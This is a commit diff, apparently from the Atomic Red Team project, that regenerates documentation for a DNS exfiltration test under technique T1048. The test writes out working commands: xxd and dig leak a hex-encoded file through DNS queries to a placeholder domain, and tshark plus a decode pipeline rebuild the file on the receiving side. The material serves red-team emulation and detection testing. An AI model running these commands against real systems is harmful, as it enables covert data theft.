Generate docs from job=validate_atomics_generate_docs branch=master

atomics/T1048/T1048.md

@@ -23,7 +23,8 @@ Anonymous FTP command-line example:(Citation: Palo Alto OilRig Oct 2016)
 
 - [Atomic Test #4 - Exfiltration Over Alternative Protocol - ICMP](#atomic-test-4---exfiltration-over-alternative-protocol---icmp)
 
-- [Atomic Test #4 - Exfiltration Over Alternative Protocol - DNS](#atomic-test-4---exfiltration-over-alternative-protocol---icmp)
+- [Atomic Test #5 - Exfiltration Over Alternative Protocol - DNS](#atomic-test-5---exfiltration-over-alternative-protocol---dns)
+
 
 <br/>
 
@@ -138,41 +139,38 @@ $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Cont
 
 
 
+<br/>
 <br/>
 
 ## Atomic Test #5 - Exfiltration Over Alternative Protocol - DNS
-Exfiltration of specified file using DNS. A domain name (example.com) and a hosting server is required. In your domain control panel, configure the below DNS settings:
-
-a) Create an A record ns1.example.com that points to the server IP. 
-
-b) Set the NS record (ns2.example.com) to point to the server (ns1.example.com).
+Exfiltration of specified file over DNS protocol.
 
 **Supported Platforms:** Linux
 
+
 #### Inputs:
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
 | domain | target DNS domain | url | ns2.example.com|
 | input_file | Path to file to be exfiltrated. | Path | ./example.txt|
-| output_file | Filename of the data exfiltrated | string | received_data.txt|
-
-
-#### Adversary machine: Run with `sh`! 
+| output_file | Filename of the data exfiltrated. | String | received_data.txt|
 
+#### Run it with these steps! 
 1. On the adversary machine run the below command.
 
-tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"" >> received_data.txt
-
-#### Attack Commands: Run with `sh`! 
+    tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"" >> received_data.txt
 
 2. On the victim machine run the below commands.
 
-xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done
-
-#### Recover data by running the below commands. Run with `sh`! 
-
+    xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done
+    
 3. Once the data is received, use the below command to recover the data.
 
-cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r
+    cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r
+
+
+
+
+
 
 <br/>

atomics/index.md

@@ -934,6 +934,7 @@
   - Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
   - Atomic Test #3: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
   - Atomic Test #4: Exfiltration Over Alternative Protocol - ICMP [windows]
+  - Atomic Test #5: Exfiltration Over Alternative Protocol - DNS [linux]
 - T1041 Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

atomics/index.yaml

@@ -27578,6 +27578,35 @@ exfiltration:
           1500, $Data) }
 
 '
+    - name: Exfiltration Over Alternative Protocol - DNS
+      description: 'Exfiltration of specified file over DNS protocol.
+
+'
+      supported_platforms:
+      - linux
+      input_arguments:
+        domain:
+          description: target DNS domain
+          type: url
+          default: ns2.example.com
+        input_file:
+          description: Path to file to be exfiltrated.
+          type: Path
+          default: "./example.txt"
+        output_file:
+          description: Filename of the data exfiltrated.
+          type: String
+          default: received_data.txt
+      executor:
+        name: manual
+        steps: "1. On the adversary machine run the below command.\n\n    tshark -f
+          \"udp port 53\" -Y \"dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name
+          matches \".domain\"\" >> received_data.txt\n\n2. On the victim machine run
+          the below commands.\n\n    xxd -p input_file > encoded_data.hex | for data
+          in `cat encoded_data.hex`; do dig $data.domain; done\n    \n3. Once the
+          data is received, use the below command to recover the data.\n\n    cat
+          output_file | cut -d \"A\" -f 2 | cut -d \" \" -f 2 | cut -d \".\" -f 1
+          | sort | uniq | xxd -p -r"
 command-and-control:
   '':
     technique:

atomics/linux-index.md

@@ -254,6 +254,7 @@
   - Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
   - Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
   - Atomic Test #3: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
+  - Atomic Test #5: Exfiltration Over Alternative Protocol - DNS [linux]
 - T1041 Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)